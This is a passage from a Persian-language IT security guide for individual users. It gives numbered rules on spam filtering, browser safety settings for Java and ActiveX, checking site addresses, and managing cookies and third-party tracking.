bayesianﺍﺯ ﻓﻨﻮﻥ ﺯﺑﺎﻥﺷﻨﺎﺳـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺑـﻪ
ﻧﺎﻣﻪ ﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻟﻐﺎﺕ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ
ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﺔ ﺭﻓﺘﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻤﺎ ﺩﺭ
ﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻗﻌﻴﺘﺎﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﺍﻣﺎ ﺑﻨﺪﺭﺕ ﺩﺭ ﻫﺮﺯﻧﺎﻣـﻪ ﻇـﺎﻫﺮ
ﻣﻲ ﺷﻮﻧﺪ .ﺻﺎﻓﻴﻬﺎﻱ bayesianﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ.
ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺷﺪﻩ ﺍﺳـﺖ ﺑﺎﻳـﺪ ﺑﺮﺭﺳـﻲ
ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ISPﺷـﻤﺎ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ
ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻳﺎ ﺧﻴﺮ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻌﻠـﻮﻡ ﺷـﻮﺩ ﺁﻳـﺎ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﻨﺪ ﻳﺎ ﻧﻪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﻧﻮﺷﺘﻪ ﺷﺪ ،ﻭﺏ ﺣﺪﻭﺩ ۱۰
ﺳﺎﻝ ﺑﺎ ﺳﻄﻮﺡ ﺩﺳﺘﺮﺳﻲ ﻣﺨﺘﻠﻒ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ
ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻭﺟﻮﺩ ﻭﺏ ﺑـﺮﺍﻱ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ
ﻣﺮﺗﺒﹰﺎ ﺩﺭ ﻛـﺎﺭ ،ﻣﺪﺭﺳـﻪ ﻭ ﺗﻔـﺮﻳﺢ ﺍﺯ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ
ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻭﺏ ﺑﺼﻮﺭﺕ ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﻭ ﺭﺍﻳـﺞ ﺩﺭ
ﺁﻣﺪﻩ ،ﻓﺮﺍﻣﻮﺵ ﺷﺪﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺤﻴﻄﻲ ﺧﺼﻮﻣﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ.
ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺮﻭﺭﮔﺮﻫﺎ
ﺑﻄﻮﺭ ﻛﻠﻲ ﻭﺏ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦ ﺍﺳـﺖ ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺧﻄـﺮﺍﺕ
ﻻ ﺩﺍﺭﺍﻱ ﻣﺘﻨﻬـﺎ
ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ .ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ
٧٨
ﻭ ﺗﺼﺎﻭﻳﺮ ﺍﻳﺴﺘﺎ ٧٧ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﻳﺎﻳﻲ ﻧﻴﺰ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﺪﻩ
ﺑﺎﺷﻨﺪ.
Static
Dynamic
77
78
٨٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻗﺎﻧﻮﻥ ﻳﺎﺯﺩﻫﻢ
ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ
ﻣﺨﺮﺏ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ downloadﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ،
ﻼ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺷـﺘﻪ
ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﺎﻣ ﹰ
ﺑﺎﺷﻴﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ downloadﭘﻮﻳـﺎ ﻭ ﺧﻮﺩﻛـﺎﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺧﻄﺮﻧﺎﻙ ﻭ ﻣﺨﺮﺏ ﻧﻴﺰ ﺑﺎﺷﺪ .ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ActiveX ،Java ،JavaScriptﻭ
ﺩﻳﮕﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧـﻮﺩ download
ﻼ ﺍﻳﻤﻦ ﺑﺎﺷﻴﺪ ﻧﺒﺎﻳـﺪ ﺍﺟـﺎﺯﺓ
ﻭ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻛﺎﻣ ﹰ
ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺻﺎﺩﺭ ﻧﻤﺎﻳﻴﺪ .ﺍﻟﺒﺘﻪ ﺑﺎ ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ
ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎ ﻣﺘﻮﺟﻪ ﺧﻮﺍﻫﻴﺪ ﺷﺪ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ
ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻣﺜﻞ ﮔﺬﺷﺘﻪ ﻛﺎﺭ ﻛﻨﻨﺪ.
ﺑﺠﺎﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳـﻦ ﻫﻤـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﻳـﺪ
ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻣﻨﻄﻘﻲ ﺑﻮﺩ:
•
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤـﻦ ﻭ ﺭﺍﻳـﺞ ﻣﺎﻧﻨـﺪ Javascriptﺭﺍ
ﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳـﺎﺩﻱ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻋﻤﻞ ﻛﻨﻨﺪ.
•
ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ Javaﻭ ActiveXﻛﻪ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ
ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴـﺪ ﻳـﺎ
ﻣﺮﻭﺭﮔــﺮ ﺧــﻮﺩ ﺭﺍ ﻃــﻮﺭﻱ ﺗﻨﻈــﻴﻢ ﻧﻤﺎﻳﻴــﺪ ﻛــﻪ ﻗﺒــﻞ ﺍﺯ
ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﺑﮕﻴـﺮﺩ .ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ
ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺪﻳﻦ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﻥ ﭘـﺲ ﺑﻌـﻀﻲ ﺍﺯ
ﺗﻮﺍﺑﻊ ﻣﺮﻭﺭﮔﺮ ﻛﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ .ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻌـﻀﻲ
ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﺩﻫﻨـﺪ ﻭ
ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺯ ﺑﻤﺎﻧﻨﺪ .ﺍﮔﺮ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻴﺪ
ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﻫـﺪ ،ﻣﺮﻭﺭﮔـﺮ ﺑﺎﻳـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧﻴﺎﺯﻫـﺎﻱ
ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨـﺪ ﻭ ﺑـﺮﺍﻱ downloadﻭ
Online Services
79
ﻗﺎﻧﻮﻥ ﺩﻭﺍﺯﺩﻫﻢ:
ﺑﻪ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺁﺩﺭﺳـﻲ ﻛـﻪ ﺑـﻪ ﺁﻥ ﻣﺘـﺼﻞ
ﻣﻲﺷﻮﻳﺪ ﺩﻗﺖ ﻛﻨﻴﺪ ﻭ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ
ﻭﺏ ﻧﺎﺷﻨﺎﺧﺘﻪ ،ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ؛ ﺧﺼﻮﺻ ﹰﺎ ﺍﮔﺮ ﺑـﻪ
ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ
ﺭﺍ ﺩﺍﺩﻩﺍﻳﺪ.
ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﺷـﻮﻧﺪ ﻛـﻪ ﺁﺩﺭﺱ
ﻻ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺣﺎﻝ ﻣﺸﺎﻫﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨـﺪ )ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﻣﻌﻤـﻮ ﹰ
Navigation Barﻳﺎ Address Barﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ( .ﻫﻨﮕﺎﻣﻴﻜـﻪ
ﻣﻜﺎﻥﻧﻤﺎﻱ ٨٠ﺷﻤﺎ ﺑﻪ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ٨١ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ ،ﺍﻳﻦ ﻭﻳﮋﮔـﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﻪ ﭼـﻪ ﺁﺩﺭﺳـﻲ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﺩ
)ﻧﻮﺍﺭ ﻭﺿﻌﻴﺖ .(٨٢ﺑﺎ ﻣﺸﺎﻫﺪﺓ ﺁﻥ ﺁﺩﺭﺱ ﻣﺘﻮﺟﻪ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﺑـﻪ
ﭼﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﻳﮕﺮﻱ ﻓﺮﺳـﺘﺎﺩﻩ ﺧﻮﺍﻫﻴـﺪ ﺷـﺪ؛ ﭘﺎﻳﮕـﺎﻫﻲ ﻛـﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ؛ ﻳـﺎ ﺷـﺎﻳﺪ ﻧﺨﻮﺍﻫﻴـﺪ ﺁﻧـﺮﺍ
ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ .ﺩﺭ ﻋﻤﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﺎ ﻫـﺮ ﻛﻠﻴـﻚ
Navigation Barﻭ Status Barﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ،ﺍﻣـﺎ
ﻭﻗﺘﻴﻜﻪ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻧﺎﺁﺷـﻨﺎ ﻫـﺴﺘﻴﺪ -ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ
Javaﻳﺎ ActiveXﺭﺍ ﻓﻌﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ -ﺑﺎﻳﺪ ﺍﺯ ﺍﻳـﻦ ﺍﺑـﺰﺍﺭ
ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ ﭼﻨﺎﻧﭽـﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﺪﻳﺪﻱ ﻫﺪﺍﻳﺖ ﺷﺪﻳﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻴﺪ.
Cookieﻫﺎ
Cookieﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﻫﻨﮕـﺎﻡ ﻣـﺸﺎﻫﺪﺓ ﻳـﻚ
ﺏ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳــﺴﻚ ﺳــﺨﺖ ﺭﺍﻳﺎﻧــﻪ ﻣــﻲﻧﻮﻳــﺴﺪ.
ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﻌﺪﻫﺎ ﺩﻭﺑﺎﺭﻩ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ،
cookieﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﺮﺍﻱ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺍﺭﺳـﺎﻝ
ﻣﻲﺷﻮﻧﺪ .ﺩﺭﻭﺍﻗﻊ ﻫﺮ cookieﻣﺮﺑﻮﻁ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺒﺪﺃ ﺧـﻮﺩ
ﺍﺳﺖ؛ ﺍﮔﺮﭼﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑﺎﻋـﺚ
ﻣــﻲﺷــﻮﻧﺪ ﻛــﻪ ﭘﺎﻳﮕﺎﻫﻬــﺎ ﺑﺘﻮﺍﻧﻨــﺪ cookieﻫــﺎﻱ ﻳﻜــﺪﻳﮕﺮ ﺭﺍ
ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﻨﺪ Cookie .ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﺬﻛﺮ ﻣـﻲﺷـﻮﺩ ﻛـﻪ
ﻼ ﺩﺭ
ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ ،ﻣﻴﻞ ﻭ ﺳﻠﻴﻘﺔ ﺷـﻤﺎ ﭼﻴـﺴﺖ ،ﻭ ﻗـﺒ ﹰ
ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﭼﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﻨﮕﺎﻣﻴﻜﻪ
Cursor
Link
Status Bar
80
81
82
ﺑﺨﺶ ﺩﻭﻡ
Downloadﭘﻮﻳﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ
ﻣﻔﻴﺪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ ﺧـﺪﻣﺎﺕ
ﻼ ﺑﻪ ﻭﻳﺮﻭﺱﻳﺎﺑﻲ ﻭ ﺭﻓـﻊ ﻣـﺸﻜﻼﺕ
ﺑﺮﺧﻂ ٧٩ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻣﺜ ﹰ
ﺍﻣﻨﻴﺘﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺷـﻤﺎ ﺑﺘﻮﺍﻧـﺪ
ﺑﺴﺎﺩﮔﻲ ﻧﺼﺐ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷـﻮﺩ؛ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ ﻻﺯﻡ ﺑﺎﺷـﺪ
ﻛﺎﺭﺑﺮ ﺭﻭﺍﻟﻬﺎﻱ ﭼﻨﺪﻣﺮﺣﻠﻪﺍﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﻓﻨﻲ ﺍﻧﺠﺎﻡ ﺩﻫﺪ.
ﺍﺟــﺮﺍﻱ ﺑﺮﻧﺎﻣــﺔ ﻣــﻮﺭﺩ ﻧﻴــﺎﺯ ﺟﻬــﺖ ﻣــﺸﺎﻫﺪﺓ ﺻــﺤﻴﺢ
ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ.
٨٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﻭﺍﺭﺩ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻲﺷـﻮﻳﺪ،
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﻳـﻚ cookieﺑـﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ
ﻼ ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ
ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ .ﻭﻗﺘﻲﻛﻪ ﻣﺜ ﹰ
ﺁﻥ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ
cookieﻣــﺬﻛﻮﺭ ﺑــﺼﻮﺭﺕ ﺧﻮﺩﻛــﺎﺭ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕــﺎﻩ ﺷــﻮﻳﺪ.
Cookieﻫﺎ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺁﻧﭽـﻪ
ﺭﺍ ﻛﻪ ﺩﺭ ﻳﻚ ﺟﻠﺴﻪ ٨٣ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ ﺭﺩﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ.
ﺍﮔﺮﭼﻪ ﻳﻚ cookieﺑﻪ ﺷﻜﻞ ﻣﻌﻤﻮﻝ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ
ﻭﺏ ﻣﺒﺪﺃ ﺧﻮﺩ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﭘﺎﻳﮕـﺎﻩ ﻭﺑـﻲ ﻛـﻪ
ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺣﺎﻭﻱ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺍﺷـﻴﺎﺀ ﺩﻳﮕـﺮﻱ ﺑﺎﺷـﺪ ﻛـﻪ
٨٤
ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳﻪ ﻫﺴﺘﻨﺪ )ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﺎﺭﺟﻲ
ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﺨﺺ ﺛﺎﻟﺚ ٨٥ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ( ﻭ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳـﻪ
ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ cookieﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤﺎﻳـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﻼ ﻣﺘﻮﺟـﻪ
ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﺮﺋﻲ ﺑﺎﺷـﻨﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺻـ ﹰ
ﻧﺸﻮﻳﺪ ﻛﻪ ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳـﻦ ﺗـﺼﺎﻭﻳ ﹺﺮ ﻏﻴﺮﻗﺎﺑـﻞ
ﺭﺅﻳﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺭﺩﻳﺎﺑﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺑـﻲ ﻛـﻪ ﺷـﻤﺎ ﺁﻧﻬـﺎ ﺭﺍ
٨٦
ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ.
ﻗﺎﻧﻮﻥ ﺳﻴﺰﺩﻫﻢ
ﭼﮕﻮﻧﮕﻲ ﻭﺿﻌﻴﺖ ﺫﺧﻴﺮﺓ cookieﻫﺎ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪ
ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺍﮔﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ
ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ )ﻣﺎﻧﻨﺪ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﻳـﻚ ﻣﻜـﺎﻥ
ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ( ﺍﻃﻼﻋﺎﺕ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ ﺭﺍ
ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻧﻜﻨﻴﺪ.
ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﺎ ﺳﻄﺢ ﻛﻨﺘﺮﻝ ﺧﺎﺻﻲ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ
